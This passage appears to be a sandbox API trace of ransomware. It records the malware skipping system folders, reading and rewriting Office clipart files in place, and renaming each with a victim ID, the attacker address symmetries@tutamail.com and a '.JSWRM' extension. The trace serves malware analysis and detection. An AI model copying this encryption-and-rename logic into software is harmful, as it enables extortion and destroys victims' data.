[0079.095] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="perflogs") returned -1 [0079.096] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="documents and settings") returned 1 [0079.096] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.096] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="system volume information") returned -1 [0079.096] lstrcmpiW (lpString1="HH01461_.WMF", lpString2="msocache") returned -1 [0079.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0079.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01461_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01461_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01461_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0079.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0079.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01461_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01461_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01461_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0079.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0079.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.096] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.096] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5958) returned 1 [0079.096] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1740) returned 0x205850 [0079.096] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1740, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1740, lpOverlapped=0x0) returned 1 [0079.098] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.098] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1740, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1740, lpOverlapped=0x0) returned 1 [0079.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.098] CloseHandle (hObject=0x314) returned 1 [0079.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0079.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0079.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0079.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0079.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.102] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.103] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf9cafe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf9cafe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c80, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01618_.WMF", cAlternateFileName="")) returned 1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2=".") returned 1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="..") returned 1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="...") returned 1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="windows") returned -1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="recovery") returned -1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="perflogs") returned -1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="documents and settings") returned 1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="system volume information") returned -1 [0079.103] lstrcmpiW (lpString1="HH01618_.WMF", lpString2="msocache") returned -1 [0079.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01618_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01618_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01618_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01618_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01618_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01618_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0079.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0079.103] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.104] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7296) returned 1 [0079.104] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c80) returned 0x205850 [0079.104] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c80, lpOverlapped=0x0) returned 1 [0079.138] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.138] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c80, lpOverlapped=0x0) returned 1 [0079.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.139] CloseHandle (hObject=0x314) returned 1 [0079.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0079.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0079.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0079.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0079.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.139] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0079.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0079.140] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1526, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01759_.WMF", cAlternateFileName="")) returned 1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2=".") returned 1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="..") returned 1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="...") returned 1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="windows") returned -1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="recovery") returned -1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="perflogs") returned -1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="documents and settings") returned 1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="system volume information") returned -1 [0079.140] lstrcmpiW (lpString1="HH01759_.WMF", lpString2="msocache") returned -1 [0079.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0079.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01759_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01759_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01759_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0079.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01759_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01759_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01759_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0079.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0079.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0079.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.142] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5414) returned 1 [0079.142] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1520) returned 0x205850 [0079.142] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1520, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1520, lpOverlapped=0x0) returned 1 [0079.144] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.144] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1520, lpOverlapped=0x0) returned 1 [0079.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.144] CloseHandle (hObject=0x314) returned 1 [0079.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0079.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0079.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0079.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0079.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.145] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0079.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0079.145] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdfc2d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdfc2d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdfc2d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa38, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH01875_.WMF", cAlternateFileName="")) returned 1 [0079.145] lstrcmpiW (lpString1="HH01875_.WMF", lpString2=".") returned 1 [0079.145] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="..") returned 1 [0079.145] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="...") returned 1 [0079.145] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="windows") returned -1 [0079.145] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="recovery") returned -1 [0079.145] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="perflogs") returned -1 [0079.145] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="documents and settings") returned 1 [0079.145] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.146] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="system volume information") returned -1 [0079.146] lstrcmpiW (lpString1="HH01875_.WMF", lpString2="msocache") returned -1 [0079.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01875_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01875_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01875_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0079.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01875_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH01875_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH01875_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0079.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: 